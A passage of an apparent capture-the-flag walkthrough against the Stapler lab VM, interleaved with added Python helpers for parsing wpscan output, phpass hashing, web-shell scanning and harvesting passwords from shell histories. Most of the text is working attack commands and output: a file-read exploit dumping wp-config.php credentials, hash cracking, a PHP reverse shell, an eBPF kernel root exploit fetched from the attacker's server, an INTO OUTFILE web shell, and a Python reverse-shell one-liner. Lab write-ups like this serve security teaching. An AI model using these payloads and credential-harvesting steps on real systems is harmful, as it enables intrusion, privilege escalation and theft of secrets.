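                current.cves.append(cve.group(1))
            continue
        m = FIXED_RE.match(line)
        if m:
            current.fixed_in = m.group(1)
        elif line.startswith("[+]") or line.startswith("[!]"):
            current = None  # any other status line closes the current finding
    return findings


def version_key(v: str) -> Tuple[int, ...]:
    """'4.5' -> (4, 5, 0) so branch and point releases compare numerically."""
    parts = tuple(int(p) for p in v.split("."))
    return parts + (0,) * (3 - len(parts))


def minimum_safe_version(findings: List[Finding]) -> Optional[str]:
    """Smallest version that closes every finding wpscan gives a fix for."""
    fixed = [f.fixed_in for f in findings if f.fixed_in]
    return max(fixed, key=version_key) if fixed else None


def unfixed(findings: List[Finding]) -> List[Finding]:
    """Findings without a 'Fixed in' line: these need a manual check, not just an upgrade."""
    return [f for f in findings if f.fixed_in is None]
```

Run it against a full wpscan capture and the unfixed list is the part worth reading first: in the output above, the Host Header Injection entry is the one with no fix version, so upgrading alone does not close it.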

Four plugins were found. Let's use searchsploit to look for exploits affecting these plugins.

root@kali:~/B2R# cp /usr/share/exploitdb/platforms/php/webapps/39646.py .
root@kali:~/B2R# ls -la 39646.py

-rwxr-xr-x 1 root root 1772 May 14 22:58 39646.py
root@kali:~/B2R#

Having a look at the exploit, we understand that it prints the contents of wp-config.php (the default WordPress configuration file) to the terminal. Let's modify the exploit so that it runs against our target.

url = "https://192.168.1.30:12380/blogblog/" # insert url to wordpress

Running the exploit gives us the following error:

root@kali:~/B2R# python 39646.py
Traceback (most recent call last):
File "39646.py", line 41, in <module>
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
File "/usr/lib/python2.7/urllib2.py", line 154, in urlopen
return opener.open(url, data, timeout)
File "/usr/lib/python2.7/urllib2.py", line 429, in open
response = self._open(req, data)
File "/usr/lib/python2.7/urllib2.py", line 447, in _open
'_open', req)
File "/usr/lib/python2.7/urllib2.py", line 407, in _call_chain
result = func(*args)
File "/usr/lib/python2.7/urllib2.py", line 1241, in https_open
context=self._context)
File "/usr/lib/python2.7/urllib2.py", line 1198, in do_open
raise URLError(err)
urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:590)>
root@kali:~/B2R#

A basic Google search suggests a fix for this: add the lines below to the exploit.

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

The exploit now looks like this.

Let's run the exploit.

root@kali:~/B2R# python 39646.py
root@kali:~/B2R# wget --no-check-certificate https://192.168.1.30:12380/blogblog/wp-content/uploads/1527501269.jpeg
--2017-05-14 23:18:38-- https://192.168.1.30:12380/blogblog/wp-content/uploads/1527501269.jpeg
Connecting to 192.168.1.30:12380... connected.
WARNING: The certificate of ‘192.168.1.30’ is not trusted.
WARNING: The certificate of ‘192.168.1.30’ hasn't got a known issuer.
The certificate's owner does not match hostname ‘192.168.1.30’
HTTP request sent, awaiting response... 200 OK
Length: 3042 (3.0K) [image/jpeg]
Saving to: ‘1527501269.jpeg’
1527501269.jpeg 100%[============================================================================================================>] 2.97K --.-KB/s in 0s
2017-05-14 23:18:38 (78.4 MB/s) - ‘1527501269.jpeg’ saved [3042/3042]
root@kali:~/B2R# ls -la 1527501269.jpeg
-rw-r--r-- 1 root root 3042 May 14 23:15 1527501269.jpeg
root@kali:~/B2R# file 1527501269.jpeg
1527501269.jpeg: PHP script, ASCII text
root@kali:~/B2R# cat 1527501269.jpeg

<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);
root@kali:~/B2R#

So we have credentials for MySQL.

root@kali:~/B2R# mysql -uroot -pplbkac -h 192.168.1.30
Warning: Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 48
Server version: 5.7.12-0ubuntu1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| loot |
| mysql |
| performance_schema |
| phpmyadmin |
| proof |
| sys |
| wordpress |
+--------------------+
8 rows in set (0.01 sec)
mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
11 rows in set (0.00 sec)
mysql> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| John | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
| Elly | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
| Peter | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
| barry | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
| heather | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
| garry | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
| harry | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
| scott | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
| kathy | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
| tim | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
| ZOE | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
| Dave | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
| Simon | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
| Abby | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
| Vicki | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
| Pam | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
+------------+------------------------------------+
16 rows in set (0.00 sec)
mysql> exit
Bye

Let's crack the password using john. Usually the first user is the admin, so to save time we will try to crack just his password 😀

root@kali:~/B2R# cat hash.txt
John:$P$B7889EMq/erHIuZapMB8GEizebcIy9.

root@kali:~/B2R# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
incorrect (John)
1g 0:00:00:52 DONE (2017-05-15 00:08) 0.01895g/s 3501p/s 3501c/s 3501C/s ireland4..im4jesus
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/B2R#
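The `$P$B...` strings in wp_users are phpass "portable" hashes, the scheme WordPress used for stored passwords: an 8-character salt and 2^13 = 8192 rounds of MD5, with the `B` after `$P$` encoding the round count. That fixed, low cost is why john gets several thousand candidates per second per core against it. The Python below is an added example, a port of the open-source phpass algorithm rather than code from this walkthrough or from WordPress itself; the sample password and salt in the usage are constructed. It hashes, verifies with a constant-time compare, and reports the round count of a stored hash, which is what a defender would look at when deciding which stored credentials to migrate to a stronger scheme.

```python
import hashlib
import hmac
import os

# phpass alphabet: the character after "$P$" is the index of log2(rounds).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base-64 variant (not RFC 4648): 3 bytes -> 4 chars, no padding."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def phpass_rounds(stored: str) -> int:
    """MD5 rounds encoded in a $P$/$H$ hash: 'B' is index 13, so 2**13 = 8192."""
    if stored[:3] not in ("$P$", "$H$") or len(stored) != 34:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("round count outside phpass limits")
    return 1 << count_log2


def _crypt_private(password: str, setting: str) -> str:
    """Port of phpass crypt_private(): md5(salt+pw), then `rounds` x md5(h+pw)."""
    rounds = phpass_rounds(setting)  # also validates the 34-char layout
    salt = setting[4:12]
    pw = password.encode("utf-8")
    h = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(rounds):
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def phpass_hash(password: str, salt: str, count_log2: int = 13) -> str:
    """Hash with an explicit salt (WordPress uses count_log2 = 13 for portable hashes)."""
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 characters from the phpass alphabet")
    # pad to 34 chars so the layout check passes; the tail is replaced by the digest
    setting = "$P$" + ITOA64[count_log2] + salt + "." * 22
    return _crypt_private(password, setting)


def phpass_new(password: str, count_log2: int = 13) -> str:
    """Hash with a fresh random salt, as WordPress does when it stores a password."""
    salt = "".join(ITOA64[b & 0x3F] for b in os.urandom(8))  # 64 divides 256: unbiased
    return phpass_hash(password, salt, count_log2)


def phpass_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and round count, then compare in constant time."""
    return hmac.compare_digest(_crypt_private(password, stored), stored)


if __name__ == "__main__":
    # constructed sample: the salt is the one from John's hash above, the password is not
    h = phpass_hash("correct horse", "7889EMq/")
    print(h, phpass_rounds(h), phpass_verify("correct horse", h))
```

8192 MD5 rounds is the whole work factor; there is no memory cost and the round count is not tunable from the WordPress side, so the practical defences are password strength and migrating stored hashes to a modern, tunable scheme. The cracked password here came straight out of rockyou.txt, which is the other half of why it fell in under a minute.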

Let's log in to the admin panel using the obtained credentials.

Let's upload the infamous php-reverse-shell by pentestmonkey as a plugin. Before uploading, make the necessary changes.

$ip = '192.168.1.28';  // CHANGE THIS
$port = 443; // CHANGE THIS

Access the shell at https://192.168.1.30:12380/blogblog/wp-content/uploads/

Before running the shell set up a listener.

root@kali:~/B2R# nc -v -n -l -p 443
listening on [any] 443 ...
connect to [192.168.1.28] from (UNKNOWN) [192.168.1.30] 59418
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
05:23:24 up 2:52, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
$ file /bin/cat

/bin/cat: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=2874f374614e9b7cd7b6cbb31e9dd3e59132943e, stripped

Privilege Escalation — Method 1

Search for relevant exploits. We find two suitable candidates: 40049.c and 39772.txt. We discard 40049.c because it targets a 64-bit machine, while our target is 32-bit.

Let's have a look at 39772.txt.

Inspecting the exploit

root@kali:~/B2R# wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2017-05-15 00:31:46-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)... 192.30.255.112, 192.30.255.113
Connecting to github.com (github.com)|192.30.255.112|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2017-05-15 00:31:46-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.24.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.24.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: ‘39772.zip’
39772.zip 100%[================================>] 6.86K --.-KB/s in 0s
2017-05-15 00:31:46 (29.5 MB/s) - ‘39772.zip’ saved [7025/7025]
root@kali:~/B2R# unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
root@kali:~/B2R# cd 39772/
root@kali:~/B2R/39772# ls

crasher.tar exploit.tar
root@kali:~/B2R/39772# tar xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
root@kali:~/B2R/39772# ls
crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar
root@kali:~/B2R/39772# cd ebpf_mapfd_doubleput_exploit/
root@kali:~/B2R/39772/ebpf_mapfd_doubleput_exploit# ls
compile.sh doubleput.c hello.c suidhelper.c
root@kali:~/B2R/39772/ebpf_mapfd_doubleput_exploit# cd ..
root@kali:~/B2R/39772# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.11 - - [15/May/2017 00:38:24] "GET / HTTP/1.1" 200 -

On the victim's shell

$ wget http://192.168.1.28:8000/exploit.tar
--2017-05-15 05:38:37--
http://192.168.1.28:8000/exploit.tar
Connecting to 192.168.1.28:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-tar]
Saving to: 'exploit.tar'
0K .......... .......... 100% 19.8M=0.001s
2017-05-15 05:38:37 (19.8 MB/s) - 'exploit.tar' saved [20480/20480]
$ ls
exploit.tar
$ tar xvf exploit.tar

ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
$ ls
ebpf_mapfd_doubleput_exploit
exploit.tar
$ cd ebpf_mapfd_doubleput_exploit
$ ls

compile.sh
doubleput.c
hello.c
suidhelper.c
$ chmod +x compile.sh
$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
$ ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -la
total 208
drwx------ 4 root root 4096 May 15 02:31 .
drwxr-xr-x 22 root root 4096 Jun 7 2016 ..
-rw------- 1 root root 1 Jun 5 2016 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 50 Jun 3 2016 .my.cnf
-rw------- 1 root root 1 Jun 5 2016 .mysql_history
drwxr-xr-x 11 root root 4096 Jun 3 2016 .oh-my-zsh
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 1024 Jun 5 2016 .rnd
drwxr-xr-x 2 root root 4096 Jun 4 2016 .vim
-rw------- 1 root root 1 Jun 5 2016 .viminfo
-rw-r--r-- 1 root root 39206 Jun 3 2016 .zcompdump
-rw-r--r-- 1 root root 39352 Jun 3 2016 .zcompdump-red-5.1.1
-rw-r--r-- 1 root root 17 Jun 3 2016 .zsh-update
-rw------- 1 root root 39 Jun 5 2016 .zsh_history
-rw-r--r-- 1 root root 2839 Jun 3 2016 .zshrc
-rwxr-xr-x 1 root root 1090 Jun 5 2016 fix-wordpress.sh
-rw-r--r-- 1 root root 463 Jun 5 2016 flag.txt
-rw-r--r-- 1 root root 345 Jun 5 2016 issue
-rwxr-xr-x 1 root root 103 Jun 5 2016 python.sh
-rw-r--r-- 1 root root 54405 Jun 5 2016 wordpress.sql
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Privilege Escalation — Method 2

There is another (simpler) way of getting root. Rather than cracking the credentials of the WordPress users, we can just upload a shell using INTO OUTFILE.

root@kali:~# mysql -uroot -pplbkac -h 192.168.1.32
Warning: Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.12-0ubuntu1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
Query OK, 1 row affected (0.00 sec)
mysql> exit
Bye

root@kali:~#
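The defensive counterpart to the INTO OUTFILE drop is finding the file afterwards. The following is an added example written for this edit, not code from the original post or from the Stapler VM: it walks a WordPress-style uploads directory, reports every PHP file it finds (an uploads tree should hold none), and flags lines where a command or code sink such as shell_exec receives a request superglobal, which is exactly the shape of the shell.php one-liner above. The directory layout and files it builds are constructed for the demo.

```python
"""Hunt for PHP web shells of the kind dropped with SELECT ... INTO OUTFILE.

Added example for this walkthrough, not part of the original post or of
Stapler. The uploads tree below is constructed in a temp directory.
"""
import os
import re
import tempfile

# PHP functions that execute OS commands or PHP code.
SINKS = r"\b(shell_exec|system|passthru|exec|popen|proc_open|eval|assert)"
# Attacker-controlled inputs.
SOURCES = r"\$_(GET|POST|REQUEST|COOKIE|SERVER)"
# A sink whose argument list contains a request superglobal is the classic one-liner.
SHELL_RE = re.compile(SINKS + r"\s*\([^;]*?" + SOURCES, re.IGNORECASE)

# Extensions Apache will typically hand to the PHP interpreter.
PHP_EXTS = (".php", ".phtml", ".php5", ".phar")


def scan_file(path):
    """Return [(line_number, matched_text)] for every sink/source pair in a file."""
    hits = []
    try:
        with open(path, "r", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                for m in SHELL_RE.finditer(line):
                    hits.append((lineno, m.group(0)))
    except OSError:
        pass  # unreadable file: nothing to report, keep walking
    return hits


def scan_uploads(root, exts=PHP_EXTS):
    """Walk an uploads tree and return {relative_path: hits} for every PHP file.

    Every PHP file is reported because an uploads directory should contain none;
    the hits list is non-empty when the content looks like a web shell.
    """
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            findings[os.path.relpath(full, root)] = scan_file(full)
    return findings


def build_sample_tree():
    """Constructed sample: a wp-content/uploads layout with one dropped shell."""
    root = tempfile.mkdtemp(prefix="uploads-")
    os.makedirs(os.path.join(root, "2016", "06"))
    with open(os.path.join(root, "2016", "06", "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0 not really a jpeg")  # benign upload
    with open(os.path.join(root, "shell.php"), "w") as fh:
        fh.write("<?php echo shell_exec($_GET['cmd']);?>\n")  # the dropped shell
    with open(os.path.join(root, "helper.php"), "w") as fh:
        # PHP that should not be here either, but uses no command sink
        fh.write("<?php function f(){ return htmlspecialchars($_GET['q']); }\n")
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    for rel, hits in sorted(scan_uploads(sample).items()):
        print(rel, "->", hits if hits else "php in uploads (no shell pattern)")
```

Run it against a real tree with scan_uploads("/var/www/https/blogblog/wp-content/uploads"); the regex is deliberately loose (a sink anywhere on the same line as a superglobal), so treat hits as leads to read, not verdicts.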

Accessing the shell in the browser

Rather than driving the shell one command at a time through the cmd parameter, we can get a reverse shell by passing Pentest Monkey's Python one-liner as the cmd value (URL-encoded, since it goes in the query string).

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.28",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Set up a listener

root@kali:~# nc -lvp 443
listening on [any] 443 ...

Execute the one liner

https://192.168.1.32:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.28%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

Accessing the shell

root@kali:~# nc -lvp 443
listening on [any] 443 ...
192.168.1.32: inverse host lookup failed: Unknown host
connect to [192.168.1.28] from (UNKNOWN) [192.168.1.32] 57390
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@red:/var/www/https/blogblog/wp-content/uploads$ cd /
cd /
www-data@red:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@red:/$ ls -la
ls -la
total 92
drwxr-xr-x 22 root root 4096 Jun 7 2016 .
drwxr-xr-x 22 root root 4096 Jun 7 2016 ..
drwxr-xr-x 2 root root 4096 Jun 3 2016 bin
drwxr-xr-x 3 root root 4096 Jun 7 2016 boot
drwxr-xr-x 19 root root 4200 May 15 17:54 dev
drwxr-xr-x 100 root root 12288 May 15 17:54 etc
drwxr-xr-x 32 root root 4096 Jun 4 2016 home
lrwxrwxrwx 1 root root 32 Jun 3 2016 initrd.img.old -> boot/initrd.img-4.4.0-21-generic
drwxr-xr-x 18 root root 4096 Jun 7 2016 lib
drwx------ 2 root root 16384 Jun 3 2016 lost+found
drwxr-xr-x 3 root root 4096 Jun 3 2016 media
drwxr-xr-x 2 root root 4096 Apr 20 2016 mnt
drwxr-xr-x 2 root root 4096 Apr 20 2016 opt
dr-xr-xr-x 153 root root 0 May 15 17:54 proc
drwx------ 4 root root 4096 May 15 17:54 root
drwxr-xr-x 26 root root 900 May 15 17:54 run
drwxr-xr-x 2 root root 4096 Jun 3 2016 sbin
drwxr-xr-x 2 root root 4096 Apr 19 2016 snap
drwxr-xr-x 4 root root 4096 Jun 4 2016 srv
dr-xr-xr-x 13 root root 0 May 15 17:54 sys
drwxrwxrwt 7 root root 4096 May 15 18:10 tmp
drwxr-xr-x 10 root root 4096 Jun 3 2016 usr
drwxr-xr-x 16 root root 4096 Jun 6 2016 var
lrwxrwxrwx 1 root root 29 Jun 3 2016 vmlinuz.old -> boot/vmlinuz-4.4.0-21-generic

Read the bash history of every user. Change to /home and cat each history file; any that is not readable by www-data (peter's, as it turns out) is skipped with a permission error.

www-data@red:/home$ cat */.bash_history
OR
www-data@red:/home$ find -name ".bash_history" -exec cat {} \;
find -name ".bash_history" -exec cat {} \;
exit
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
top
ps aux
exit
exit
id
cat: ./peter/.bash_history: Permission denied
find: './peter/.cache': Permission denied
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
exit
exit
exit
exit
whoami
exit
exit
exit
top
exit
www-data@red:/home$

So the two sets of credentials recovered from JKanode's history are

peter   : JZQuyIN5
JKanode : thisimypassword
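Reading every history file by eye is fine on one box; the check is worth automating when there are many. The following is an added example, not code from the original post: it pulls command-line passwords out of shell history lines for sshpass, mysql and curl, and can walk /home the same way the cat above did, skipping histories it cannot read. The sample history is constructed; the two sshpass lines are the ones from JKanode's history above, the mysql and curl lines are made up.

```python
"""Extract credentials that were typed on the command line from shell history.

Added example for this walkthrough, not part of the original post. The
SAMPLE_HISTORY below is constructed for the demo.
"""
import glob
import os
import re

# Each pattern must name a 'pw' group; 'user' and 'host' are optional.
PATTERNS = [
    # sshpass -p <pw> [ssh] [options] user@host   (the two forms seen in the history)
    re.compile(r"sshpass\s+-p\s*(?P<pw>\S+)\s+(?:ssh\s+)?(?:\S+\s+)*?(?P<user>[\w.-]+)@(?P<host>\S+)"),
    # mysql -u<user> -p<pw> ...  (a bare -p with no value prompts and leaks nothing)
    re.compile(r"mysql\b.*?-u\s*(?P<user>\S+).*?-p(?P<pw>\S+)"),
    # curl -u user:password ...
    re.compile(r"curl\b.*?-u\s*(?P<user>[^:\s]+):(?P<pw>\S+)"),
]


def extract_credentials(lines):
    """Return [{'user', 'password', 'host', 'line'}] for every history line that leaks a password."""
    creds = []
    for line in lines:
        line = line.strip()
        for pat in PATTERNS:
            m = pat.search(line)
            if m:
                d = m.groupdict()
                creds.append({"user": d.get("user"), "password": d["pw"],
                              "host": d.get("host"), "line": line})
                break  # one finding per line is enough
    return creds


def scan_home_dirs(home="/home"):
    """Check every readable /home/*/.*_history (bash, zsh, mysql ...); unreadable ones are skipped."""
    results = {}
    for path in glob.glob(os.path.join(home, "*", ".*_history")):
        try:
            with open(path, errors="replace") as fh:
                found = extract_credentials(fh)
        except OSError:
            continue  # e.g. a 0600 history owned by another user
        if found:
            results[path] = found
    return results


# Constructed sample: JKanode's two sshpass lines plus made-up mysql and curl lines.
SAMPLE_HISTORY = """exit
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
mysql -uroot -pplbkac -h 192.168.1.32
curl -u deploy:S3cret http://intranet/api
ps -ef
"""

if __name__ == "__main__":
    for c in extract_credentials(SAMPLE_HISTORY.splitlines()):
        print(f"{c['user']} : {c['password']}  (host={c['host']})  <- {c['line']}")
```

On the target itself run scan_home_dirs() from the www-data shell; it returns a dict keyed by history path so the finding can be tied back to the user who typed it.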

Let's log in via SSH as peter.

root@kali:~# ssh peter@192.168.1.32
